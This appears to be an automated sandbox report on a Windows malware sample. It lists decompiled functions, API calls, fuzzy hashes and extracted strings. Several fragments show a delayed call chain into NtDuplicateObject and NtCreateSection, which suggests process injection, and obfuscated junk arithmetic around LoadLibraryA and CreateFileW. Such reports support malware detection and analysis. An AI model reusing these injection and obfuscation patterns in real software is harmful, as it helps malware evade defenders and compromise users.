Snapshot File: hcaresult_4_2_409000_wdscede.jbxd

Similarity

API ID: __malloc_crt
String ID:
API String ID: 3464615804-0
Opcode ID: d2e1470bf1e14fee2f364b4b2cba28523d35b5fbdd86699027dbd1e69513b5c9
Instruction ID: 323b23f4980721603d1b81e7f4a00e8822b399017b87e822afdf0d267b719a7f
Opcode Fuzzy Hash: d2e1470bf1e14fee2f364b4b2cba28523d35b5fbdd86699027dbd1e69513b5c9
Instruction Fuzzy Hash: 2EF0E2B67041206ACB2076357C458771228DACA329316483BF892E3290E7384E834AFC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C097 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040C0AC

Memory Dump Source

Source File: 00000004.00000002.583987724.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_wdscede.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 946429e41a207e3580989b5d0d70526d6c9ba7e364734d260efe7e4813abf738
Instruction ID: 3a6d5b6f7e7fdacef3b44ab4ddaca668afc427c856f8126fee3b79d36973f55a
Opcode Fuzzy Hash: 946429e41a207e3580989b5d0d70526d6c9ba7e364734d260efe7e4813abf738
Instruction Fuzzy Hash: F7D05E729903459ADB10AFB1AC49B723BDCD3887D5F108836F91CC7690E674C560CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB6C Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__encode_pointer.LIBCMT ref: 0040BB6E

Part of subcall function 0040BAFA: RtlEncodePointer.NTDLL(00000000,?,0040BB73,00000000,00410E3D,02B8EBD0,00000000,00000314,?,0040B558,02B8EBD0,00401EE8,00012010), ref: 0040BB61

Memory Dump Source

Source File: 00000004.00000002.583987724.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_wdscede.jbxd

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: eb4c04dab62c67ba7530d716b90cb2f1624144ac0887d613fde26541813fc3e3
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004019F2 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004019F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				char* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t24;

				_t8 = 0x1a3f;
				_push(0x6c);
				_t15 =  *_t21;
				_t22 = _t21 + 4;
				_push(0xad);
				_t17 =  *_t22;
				L004012A4(_t8, _t13, _t15, _t17, _t19, _t20, _t24);
				_t14 = _a4;
				Sleep(0x1388);
				_t9 =  &_v8;
				_push(_t9);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				E00401521(); // executed
				_t25 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t19, _t20, _t25);
				return 0x1a3f;
			}

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction ID: 25844bbcf1cbe2862b2fc1e39125094b9f234e696ff082aa1ccfa1e087edcb68
Opcode Fuzzy Hash: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction Fuzzy Hash: 7301AD3170A205EBEB00AA948D41EBB32299F85314F3404B7BA53B91F1D67D89136F6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0A Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00401A0A() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc al, ah");
				_t8 = 0x1a3f;
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction ID: d8c634ebd0fb47f8dbfc2dcf49b775dfd32c4584f4b3c73897dcc7655f38e994
Opcode Fuzzy Hash: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction Fuzzy Hash: A6014C3270A205EBDB009A948D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00401A01(void* __ecx) {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t32;

				_t32 = __ecx - 1;
				_t8 = 0x1a3f;
				_push(0x6c);
				_t18 =  *_t28;
				_t29 = _t28 + 4;
				_push(0xad);
				_t20 =  *_t29;
				L004012A4(_t8, _t13, _t18, _t20, _t22, _t24, _t32);
				_t14 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_t9 = _t26 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t33 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t22, _t24, _t33);
				return 0x1a3f;
			}

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction ID: bb8f854860517b91ef23627f573853fa0fc08e5855f63139474b369349933f98
Opcode Fuzzy Hash: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction Fuzzy Hash: D9015E3170A201EBEB009AD48D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0E Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00401A0E() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc ch, bl");
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction ID: 2e2055f9db7f7bfa196961a35f33946421e8fe2f98abc4ca2717ed5341f40e74
Opcode Fuzzy Hash: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction Fuzzy Hash: C401713170A201EBDB00AAD4CD41BBA32259F86314F2444B7BA53B91F1D67D8913AF2F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040BC61 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 0040BC7E
__lock.LIBCMT ref: 0040BCD9
__lock.LIBCMT ref: 0040BCFA
___addlocaleref.LIBCMT ref: 0040BD18

Memory Dump Source

Source File: 00000004.00000002.583987724.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_wdscede.jbxd

Similarity

API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
String ID:
API String ID: 1628550938-0
Opcode ID: dd9c941b7d5243e807d78a2ff3ca0a7c98cc4853e136772392673b276f99019d
Instruction ID: 30c0c8111be0bbeb9f42d495f58f615a9bb7a61a946e7c3ae008e394fa3971bb
Opcode Fuzzy Hash: dd9c941b7d5243e807d78a2ff3ca0a7c98cc4853e136772392673b276f99019d
Instruction Fuzzy Hash: 44119D71904702AEE720AF669941B5ABBE0AF04318F10493FE599B73E1CB789940CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB1F Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040CB2B

Part of subcall function 0040BDC1: __getptd_noexit.LIBCMT ref: 0040BDC4
Part of subcall function 0040BDC1: __amsg_exit.LIBCMT ref: 0040BDD1

__getptd.LIBCMT ref: 0040CB42
__amsg_exit.LIBCMT ref: 0040CB50
__lock.LIBCMT ref: 0040CB60

Memory Dump Source

Source File: 00000004.00000002.583987724.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_wdscede.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 28ef39373d2d80ff1ea67696e6b4150e91f1d702da5ad9707b4328577ce6dd30
Instruction ID: 6f8d3a60b8f59a529b8c558f61c376ca78f6142a8e8cfd50cb85859c21d3f7cc
Opcode Fuzzy Hash: 28ef39373d2d80ff1ea67696e6b4150e91f1d702da5ad9707b4328577ce6dd30
Instruction Fuzzy Hash: 85F06232A40714CBD720BB65984775A73A09F00724F10467FB940B72D2CB3CA941DA9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: EE5A.exePID: 916, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.3%
Total number of Nodes:	30
Total number of Limit Nodes:	3

Executed Functions

Function 004AA034 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptCreateHash.ADVAPI32 ref: 004AA07C

Strings

H:, xrefs: 004AA038
scrptadm.dll, xrefs: 004AA098
user.exe, xrefs: 004AA0EA
disrvpp.dll, xrefs: 004AA145, 004AA14A

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CreateCryptHash
String ID: H:$disrvpp.dll$scrptadm.dll$user.exe
API String ID: 4184778727-4163003699
Opcode ID: 77f62e95b656cbaf6681e35eec8d2e4f3d51538f1eddc9b435c1f1b6cda0c678
Instruction ID: d0f6fb0aaf16a54759322110369bb28d722d519f51f10f7916d4aecad96a45d0
Opcode Fuzzy Hash: 77f62e95b656cbaf6681e35eec8d2e4f3d51538f1eddc9b435c1f1b6cda0c678
Instruction Fuzzy Hash: 87311265F542068BCB00DF7DEC802E93BF2EF3A314B448036D855D7365E6294925CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004A8535 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 194
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001), ref: 004A878D

Strings

*, xrefs: 004A856F
,6, xrefs: 004A8707
KBDBGPH.DLL, xrefs: 004A8658
CoRevokeInitializeSpy, xrefs: 004A87A8
LogonUserExA, xrefs: 004A86CC
+M4, xrefs: 004A86DA
ehshell.dll, xrefs: 004A870C
*i", xrefs: 004A860D
user.exe, xrefs: 004A876C

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CreateFile
String ID: *$*i"$+M4$CoRevokeInitializeSpy$KBDBGPH.DLL$LogonUserExA$ehshell.dll$user.exe$,6
API String ID: 823142352-3199993408
Opcode ID: 968f2144e39bde30decd37bb040fbf80d246207c8643a93d2c47343b0d09632c
Instruction ID: a2871501f64acabafba878e0503fd9866f16c5ce015b10f2261cf34378c8f4f2
Opcode Fuzzy Hash: 968f2144e39bde30decd37bb040fbf80d246207c8643a93d2c47343b0d09632c
Instruction Fuzzy Hash: E371FF61E443059BDB00EFBDED942EA7BB2EB2A310B44803ED944D7362E7784995C75C

Uniqueness

Uniqueness Score: -1.00%

Function 004A8A07 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 004A8A7B

Strings

mssip32.dll, xrefs: 004A8A9D
PortableDeviceWMDRM.dll, xrefs: 004A8A17
KBDBGPH.DLL, xrefs: 004A8AC1
sspicli.dll, xrefs: 004A8A59
0u?, xrefs: 004A8AA6

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID: 0u?$KBDBGPH.DLL$PortableDeviceWMDRM.dll$mssip32.dll$sspicli.dll
API String ID: 2591292051-1013441646
Opcode ID: 3b786cff74c823f68e7dff81f4c2bb34491c032c81792b6e06ee95cde9ee3d64
Instruction ID: 6c45eb4f0b92d301b46b5666873fb9d968d5dc1b27b8e6eaa95c462088752e49
Opcode Fuzzy Hash: 3b786cff74c823f68e7dff81f4c2bb34491c032c81792b6e06ee95cde9ee3d64
Instruction Fuzzy Hash: FD31CC25E452099FCB00DFB8E8942ED7BB1EF3A304F40407B8989D7762E6391A5AC759

Uniqueness

Uniqueness Score: -1.00%

Function 0046763A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00467680

Strings

CreateActCtxW, xrefs: 0046768D
user.exe, xrefs: 00467643

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: LibraryLoad
String ID: CreateActCtxW$user.exe
API String ID: 1029625771-2600503287
Opcode ID: c45d3b619ba9e0527bbeb15cf11c10d54a19657924c636c3749ee49013ebe438
Instruction ID: bc11df9dbd7a4726b9e2363771d8e6e8561a1472d0a40eec8ecdad4a40382252
Opcode Fuzzy Hash: c45d3b619ba9e0527bbeb15cf11c10d54a19657924c636c3749ee49013ebe438
Instruction Fuzzy Hash: 18F0E530A586099FCB009B5DD48069E3BB1EB18314F40C03BD906E7761D37C0941C35E

Uniqueness

Uniqueness Score: -1.00%

Function 00463CD5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00463CD5(struct HINSTANCE__* __eax, short __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t19;
				char _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				char _t27;
				intOrPtr _t41;
				short _t44;
				signed char _t54;
				void* _t63;
				void* _t66;
				void* _t67;
				void* _t69;

				_t66 = __esi;
				_t63 = __edi;
				_t54 = __edx;
				_t44 = __ecx;
				_t32 = 0x222ef0;
				 *(_t69 - 8) = __eax;
				L004618E3(__eax, 0x222ef0, __ecx, __edx, __edi, __esi, 1, 0x222ef0);
				_t19 =  *(_t69 - 8);
				 *(_t69 - 0x28) = _t19;
				 *(_t69 - 8) = _t19;
				if(_t19 == 0x3121) {
					L2:
					_t54 =  *0x4fd1fe; // 0xa5ad
					 *0x4fff19 = _t19;
					L3:
					_t20 =  *0x4fff1b; // 0x0
					_t67 = _t66 - 0xd6b4;
					 *0x4fff1e = _t20;
					_t21 =  *(_t69 - 8);
					_push( *(_t69 - 0x28));
					 *0x4fff1d = _t21;
					 *(_t69 - 8) = _t21;
					if(_t32 > 0x3338) {
						L8:
						 *((intOrPtr*)(_t69 - 0xc)) = _t32;
						L9:
						 *0x4fd18c = 0x6b75;
						 *0x4fff19 =  *0x4fff19 - _t21;
						_t23 = LoadLibraryA(??); // executed
						 *0x4fd1f6 = 0x83bb89;
						 *(_t69 - 8) = _t23;
						E004622AA(_t23, 0xb6, 0x6b75, 0x4fff19, _t63, _t67, 0xb6);
						_t25 =  *(_t69 - 8);
						if(0x3ee4b0 != 0x6b75) {
							 *0x4fff16 =  *0x4fff16 - 0x756e;
							if(_t67 == 0xb008d4) {
							}
						}
						 *0x4fd553 =  *0x4fd553 - _t25;
						 *0x4fd67b = _t25;
						 *0x4fd473 = _t25;
						 *(_t69 - 8) = _t25;
						_push(0x463e71);
						_push(L0045EEBA);
						return 0x2c7d87;
					}
					_t41 =  *0x4fdd73; // 0x1f9f
					_t32 = _t41 + 0x4d;
					if(_t44 >= _t44) {
						goto L8;
					}
					_t44 = 0x8211;
					 *0x4fd1d2 = _t54;
					_t27 = _t21 - 0xb4;
					 *0x4fff1b = _t27;
					if(_t67 > 0) {
						 *0x4fff1e = 0xdc;
						_t27 = 0x129765;
					}
					 *0x4fd058 =  *0x4fd058 - _t27;
					_t21 = _t27 + _t27;
					_t32 = _t32 + 0x2ee06d;
					if(_t32 != 0x3d) {
						goto L9;
					} else {
						goto L8;
					}
				}
				_t32 = 0xffffffffffd9d559;
				 *((intOrPtr*)(_t69 - 0xc)) = _t44;
				 *0x4fd134 = _t44;
				_t44 = 0xffffffffffff87e9;
				 *0x4fd1b4 = _t54;
				if((_t54 & 0x00000092) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00463cd5
0x00463cd5
0x00463cd5
0x00463cd5
0x00463cdb
0x00463ce0
0x00463ce6
0x00463ceb
0x00463cee
0x00463cf1
0x00463cf8
0x00463d20
0x00463d20
0x00463d27
0x00463d2f
0x00463d2f
0x00463d35
0x00463d3a
0x00463d3f
0x00463d42
0x00463d45
0x00463d4a
0x00463d52
0x00463db0
0x00463db0
0x00463db3
0x00463dc0
0x00463dd1
0x00463dda
0x00463de0
0x00463def
0x00463df3
0x00463e03
0x00463e09
0x00463e19
0x00463e38
0x00463e38
0x00463e38
0x00463e47
0x00463e4d
0x00463e54
0x00463e59
0x00463e66
0x00463e6b
0x00463e70
0x00463e70
0x00463d54
0x00463d5d
0x00463d60
0x00000000
0x00000000
0x00463d6b
0x00463d6f
0x00463d7b
0x00463d7e
0x00463d86
0x00463d8a
0x00463d97
0x00463d97
0x00463d9c
0x00463da3
0x00463da5
0x00463dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00463dae
0x00463cfd
0x00463d03
0x00463d06
0x00463d0f
0x00463d14
0x00463d1e
0x00000000
0x00000000
0x00000000

APIs

LoadLibraryA.KERNELBASE(?,00000001,00222EF0), ref: 00463DDA

Strings

ehshell.dll, xrefs: 00463E61

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: LibraryLoad
String ID: ehshell.dll
API String ID: 1029625771-974196490
Opcode ID: 896a939ac57b624c4906e1ee06fbf8d17a9ccd4c73b99dca319a74db3de1fa20
Instruction ID: 80aba7edd338b0228b184c5e48a0229f438da915a553e81b7d606f9a10dfb4b5
Opcode Fuzzy Hash: 896a939ac57b624c4906e1ee06fbf8d17a9ccd4c73b99dca319a74db3de1fa20
Instruction Fuzzy Hash: 8C41D574D043849FDB01EF78E9946E93BB2EB2A314F04407BC90597762E3340629CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004C8A47 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E004C8A47(signed int __ebx, short __ecx, void* __edx, short __esi, void* __eflags) {
				void* _t6;
				void* _t9;
				void* _t12;
				intOrPtr _t14;
				short _t17;
				void* _t20;
				short _t21;
				void* _t22;

				_t21 = __esi;
				_t17 = __ecx;
				_t13 = __ebx;
				E004A47B2(_t6, __ebx, __ecx, __edx, _t20, 0);
				 *0x4fd196 = _t17;
				 *0x4fd22e = _t21;
				_t9 = CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				 *(_t22 - 8) = _t9;
				_t12 =  *(_t22 - 8);
				if(_t12 == 0xffffffff) {
					return _t12;
				} else {
					if(_t12 >= 0) {
						 *0x4fff1e = _t12;
						_t13 = __ebx & 0x0000000c;
					}
					_t14 = _t13 + 0x19164d;
					 *(_t22 - 8) = _t12;
					 *((intOrPtr*)(_t22 - 0xc)) = _t14;
					 *0x4fff14 =  *0x4fff14 + _t14 - 0x4364 + 1;
					_push(E004C8AB6);
					_push(L0049EEB0);
					return _t12;
				}
			}

0x004c8a47
0x004c8a47
0x004c8a47
0x004c8a49
0x004c8a4e
0x004c8a5f
0x004c8a69
0x004c8a6f
0x004c8a79
0x004c8a7f
0x004c902a
0x004c8a85
0x004c8a87
0x004c8a89
0x004c8a8e
0x004c8a8e
0x004c8a91
0x004c8a97
0x004c8a9a
0x004c8aa5
0x004c8aab
0x004c8ab0
0x004c8ab5
0x004c8ab5

APIs

CreateFileW.KERNELBASE ref: 004C8A69

Strings

EhStorAuthn.exe, xrefs: 004C8A72

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CreateFile
String ID: EhStorAuthn.exe
API String ID: 823142352-279121437
Opcode ID: e426c7c1f1c2eab7547540c74a8046262c2ff6f0ec275fe47168b428fe37dc1b
Instruction ID: e0c847d3ee4d220c922d11d82204967ead57a7e45222954fffe65fa7f2c44e4b
Opcode Fuzzy Hash: e426c7c1f1c2eab7547540c74a8046262c2ff6f0ec275fe47168b428fe37dc1b
Instruction Fuzzy Hash: 82F05E28E542459BCB00DF6AE8806A87B71FB6A300B14017FE854D73A1D3795A55C72D

Uniqueness

Uniqueness Score: -1.00%

Function 004A5AFF Relevance: 1.3, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004A5AFF(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _t14;

				_v16 = 0;
				_t14 = _a8 + _a8;
				_v8 = _t14;
				_v12 = _t14;
				_push(_v12);
				E0049CD07(); // executed
				_v16 = _t14;
				E004A5A8F(_v16, _a4, _a8);
				CharUpperBuffA(_v16, _v8); // executed
				return _v16;
			}

0x004a5b05
0x004a5b0f
0x004a5b11
0x004a5b14
0x004a5b17
0x004a5b1a
0x004a5b1f
0x004a5b2b
0x004a5b36
0x004a5b40

APIs

CharUpperBuffA.USER32(00000000,?,?), ref: 004A5B36

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 4afad3b06ebe8dba8d1e86f7456f631b893d29f478c7721d2694b3980f0126db
Instruction ID: 36a7a57f4313033f9a8531ff8b9a6feaeb76c34f64f07e47049e2e03a4b0237c
Opcode Fuzzy Hash: 4afad3b06ebe8dba8d1e86f7456f631b893d29f478c7721d2694b3980f0126db
Instruction Fuzzy Hash: 91F04E75D00108FFCF41DFA9D845A9DBFB5AF14318F1082A5A924A6261E7369A24EF44

Uniqueness

Uniqueness Score: -1.00%

Function 004FB200 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004FB200(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x004fb202
0x004fb208
0x004fb210
0x004fb204
0x004fb206
0x004fb206

APIs

malloc.MSVCRT ref: 004FB208

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 848c5e8f9a05c015a8dfad3e0ea19ad11912fbad5b5f9291dbf41e5b8019e3de
